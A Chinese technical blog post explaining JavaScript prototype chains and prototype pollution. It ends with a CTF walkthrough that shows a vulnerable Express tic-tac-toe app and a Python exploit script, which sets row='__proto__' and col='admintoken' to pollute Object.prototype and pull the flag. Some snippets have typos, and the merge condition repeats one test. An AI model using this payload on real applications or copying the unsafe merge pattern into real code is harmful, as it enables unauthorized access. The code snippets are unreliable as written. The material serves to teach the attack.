原型链污染

最新推荐文章于 2024-07-26 20:46:33 发布
最新推荐文章于 2024-07-26 20:46:33 发布
阅读量1.1k 收藏 23
点赞数 27
文章标签: javascript 开发语言 web安全 网络安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BKN711/article/details/137695331
版权

1. 原型对象(继承)

上面代码中

cat1和cat2是Animal的实例对象, color是cat1和cat2的原型对象

原型对象可以让所有实例对象共享

2.原型链

原型对象也是对象,它也有自己的原型。这就形成了原型链

原型链的尽头是null  (Object.prototype === null)

Object.getPrototypeof(f)     //获取原型对象,返回f的原型对象

Object.setPrototypeof(a,b)   //设置原型对象,将b设为a的原型对象,b是原型对象

Object.creat()               //接受一个对象作为参数,以它为原型对象,返回一个实例对象 
 
例:
var A = {
    print:function(){}
}

var B = Object.create(A)
Object.getPrototypeof(B) === A     //true
B.print === A.print                //true

var C = Object.create(null)
Object.getPrototypelf(C) === null   //true

__proto__属性设置原型对象

var x = {}
var y = {}
x.__proto__ = y
Object.getPrototypeof(x) === y    //true

3. constructor属性

prototype对象有一个constructor属性,默认指向所在的构造函数

function  Demo(){
    
}

var x = new Demo()

x.constructor === Demo    //true

Demo.prototype.constructor === Demo    //true

var y = new x.constructor()

y instanceof Demo    //true

当原型对象修改后

Demo.prototype = {
    metho : function(){}
}

Demo.prototype.constructor === Demo    //false
Demo.prototype.constructor === Object  //true

Demo的新原型为普通对象,普通对象的constructor指向Object构造函数

所以修改原型时,一定要修改constructor属性指向

//较好方法
Demo.prototype = {
    constructor : Demo ,
    method1 : function(){}
}

//最好方法,不改变指向
Demo.prototype.method1 = function(){}

4.原型链三属性之间关系

1、一个对象的__proto__属性指向这个对象所在类的prototype属性

2、每一个类有一个prototype属性,指向其原型对象

3、原型对象的constructor属性指向其所在的构造函数

4、构造函数的constructor属性指向本身

function A(){
      //构造函数
}

var a = new A()
a.__ proto__ === A.prototype       //true
A.prototype.constructor === A      //true

var b = {}
b是一个Object
b.__proto__ === Object.prototype

5.原型链污染

如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染。

(1)merge函数

function merge(target,source){
    for (let key in source){
        if(key in target && key in target){
            merge(target[key],source[key])
        }else{
            target[key] = source[key]
        }
    }
}

merge函数的目的是将source对象中的属性合并到target对象中。如果source对象和target对象具有

相同的键(属性名),那么merge函数将递归地将嵌套对象的属性合并。否则,如果source对象具

有target对象中不存在的键,merge函数将直接将该键值对添加到target对象中.

(2)通过修改__proto__属性污染原型链

var a ={}
var b= {"__proto__":{num:2}}      //不能通过这种方式修改a.__proto__

var c={}
consle.info(c.num)

此时Object类没有被修改,故而原型类为Object的c对象并没有num这个属性。

因为b中的__proto__已经被解析成原型了

所以必须用JSON.parse

var b= JSON.parse('{"__proto__":{num:2}}')

merge(a,b)

var c={}
c.num === 2      //true

原型链已经污染,声明一个空对象c后可以直接拿到num属性

6.实例

hackit2018

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
//目前user并没有admintoken
var user = []; //empty for now
 
var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}
 
function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}
 
app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);
 
app.get('/', (req, res) => {
 
    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];
 
    }
    res.render('index');
})
 
 
app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)
 
 
app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;
 
    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }
 
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 
 
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }
 
    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }
 
})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

解析:

if(user.admintoken && req.query.querytoken && md5(user.admintoken) ===req.query.querytoken)

获取到flag的条件是传入的querytoken和user.admintoken的md5值等,并且都要存在。

user没有admintoken这个属性,是一个空对象,但存在给另一个空对象matrix赋值的代码

matrix[client.row][client.col] = client.data;

他们的原型对象都是Objec,其中row,col,data都是post传入的,是可控的,所以可以用原型链污染攻击方式让user拿到admintoken

使   row=__proto__ ,  col = admintoken ,再让url传入querytoken的值等于data的md5值

import requests
import json
 
url = "http://192.168.174.123:3000/api"
url1 = "http://192.168.174.123:3000/admin?querytoken=de9b9ed78d7e2e1dceeffee780e2f919"
 
headers = {"Content-type": "application/json"}
 
data = {"row": "__proto__", "col": "admintoken", "data": "test"}
 
res1 = requests.post(url, headers=headers, data=json.dumps(data))
# json.dumps与json.parse是相同的 
res2 = requests.get(url1)
 
print(res2.text)

运行结果:

BKN711
关注
  • 27
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
原型链污染漏洞+前后端实战案例
08-04
原型链污染漏洞是一种安全问题,它允许攻击者通过篡改或注入代码来操纵对象的原型,从而可能导致数据泄漏、逻辑错误甚至完全控制应用程序。本文将深入探讨原型链污染的概念、其产生的原因以及在前端和后端开发中的...
【技术分享】从浅入深 Javascript 原型链原型链污染 .pdf
09-05
本文将深入探讨JavaScript原型链的工作原理及其可能导致的安全问题——原型链污染。 首先,JavaScript 中的对象继承并不像传统面向对象语言那样基于类,而是通过原型链机制。每个对象都有一个内部属性`[[Prototype]...
JavaScript作用域、闭包、对象与原型链概念及用法实例总结
10-18
例如,使用闭包可以避免全局变量污染,利用原型链实现继承,理解作用域可以帮助管理变量生命周期,而正确处理`this`能确保代码逻辑的正确性。实践是检验理论的最好方式,通过编写实际的代码实例,你可以更好地理解并...
comp4901o-presentation:COMP 4901O演示文稿-JavaScript原型污染
03-22
原型污染通常发生在以下情况:当开发者使用不安全的代码(例如,没有充分验证用户输入)来设置对象属性时,攻击者可以利用这个机会将恶意数据注入到原型链中。例如,如果一个函数尝试将用户输入作为对象属性添加到...
JavaScript青少年简明教程:函数及其相关知识(下)
最新发布
cnds123的专栏
07-26 463
JavaScript青少年简明教程:函数及其相关知识(下)
HarmonyOS应用开发者高级认证,Next版本发布后最新题库 - 多选题序号4
Gusha_的博客
07-23 1290
HarmonyOS应用开发者高级认证最新题库,编写于2024年7月19日,Next版本发布之后
【React 】开发环境搭建详细指南
lph159的博客
07-24 1074
无论你是刚刚开始学习 React,还是希望在现有项目中采用 React 技术,搭建一个高效的开发环境都是至关重要的。本文将详细介绍如何从零开始搭建 React 开发环境,涵盖所需的工具和最佳实践,帮助你快速启动并顺利进行开发。Visual Studio Code(VS Code)是目前最流行的代码编辑器之一,提供了丰富的扩展和强大的功能。如果你希望对项目的配置有更多的控制,可以选择手动配置 React 项目。下载并安装最新版本的 Node.js,安装 Node.js 后,npm 会自动安装。
已解决:vue-office/excel 多个sheet点击切换,滚动条高度不重置,表格视图位置不正确
weixin_42289080的博客
07-26 154
解决 @vue-office/excel 多个sheet切换,内容以及滚动条展示不正确的问题
vue el-select的下拉树形结构 带检索功能
Jokerxiuka的博客
07-26 101
【代码】vue el-select的下拉树形结构。
Angular由一个bug说起之八:实践中遇到的一个数据颗粒度的问题
KenkoTech的博客
07-24 638
之所以使用这种比较直接的方式是因为项目中的数据类型已经确定,而且对数字的处理逻辑没有统一在一个文件中。这是大型项目经常遇到的问题,起到相同作用的代码因为一些小的差别而分别写在管理各自功能的文件里。文件存入数据库,这样我们就可以统一维护一个表,不管是前端来处理数据还是后端来处理都能遵守相同的规则。针对这篇文章提到的数字缩写的问题,可以有两种处理方案。来展示数据的功能,这些数据根据不同的类型和单位会为其加上前缀、后缀或者省略小数。
el-menu根据多层树形结构递归遍历展示菜单栏
m0_62317155的博客
07-23 918
el-menu根据多层树形结构递归遍历展示菜单栏
爬虫基本原理入门
RHeng的博客
07-25 822
爬虫(Web Crawler),又称为网络爬虫或网页蜘蛛,是一种按照一定的规则,自动地抓取万维网信息的程序或者脚本。它们可以模拟浏览器行为,遍历网页并抓取网页中的信息,如文本、图片、链接等。接下来,我们会尝试使用Python等编程语言,结合相关库和工具,动手编写自己的爬虫程序,探索更多关于爬虫技术的奥秘。
typescript中type和interface有什么区别,如何选择?
闻人放歌的三寸青草园圃
07-23 155
【代码】typescript中type和interface有什么区别,如何选择?
牛客JS题(二)直角三角形
不起眼小菜菜的博客
07-25 201
注释很详细,直接上代码……
如何关闭页面报错的遮罩层
karlaofsky的博客
07-25 198
在vue.config.js中添加如下配置,问题:如何关闭页面报错的遮罩层。
刷新当前页面
Garbrielle的博客
07-26 135
相当于按了 F5, 因此缺点也很明显, 体验感不佳, 因为要加载所有页面资源相对较慢, 比较耗时.
【JS逆向课件:第十九课:jQuery】
weixin_50556117的博客
07-24 990
jQuery是一个快速、简洁的JavaScript框架。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理等功能。jQuery兼容各种主流浏览器,如IE 6.0+、FF 1.5+、Safari 2.0+、Opera 9.0+等。
记录一次centos部署node高版本踩坑记录
weixin_42770320的博客
07-26 245
最后总结一下,有时候做事情真的不能这么死板,不要在一棵树上吊死,要有多种方案去选择,不要永远去死磕一种方案,反正都是不熟悉的领域,尝试过一定时间,搞不通应该果断放弃,不要总是强迫自己要一定要这种方案,俗话说的好,只要思想不滑坡,办法总比困难多哈哈哈,最后真的真的非常非常感激docker,docker真的神中神中神中神。
【Echarts示例】类甘特图的时间线图表
随便写写
07-22 386
Echarts示例 - 类甘特图的时间线图表
ctfshow 原型链污染
10-14
好的,你的问题是关于原型链污染的。原型链污染是一种攻击方式,通过修改目标对象的原型链来实现攻击目的。攻击者可以通过修改原型链来篡改对象的属性或方法,从而达到攻击的目的。 例如,攻击者可以通过修改Object...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值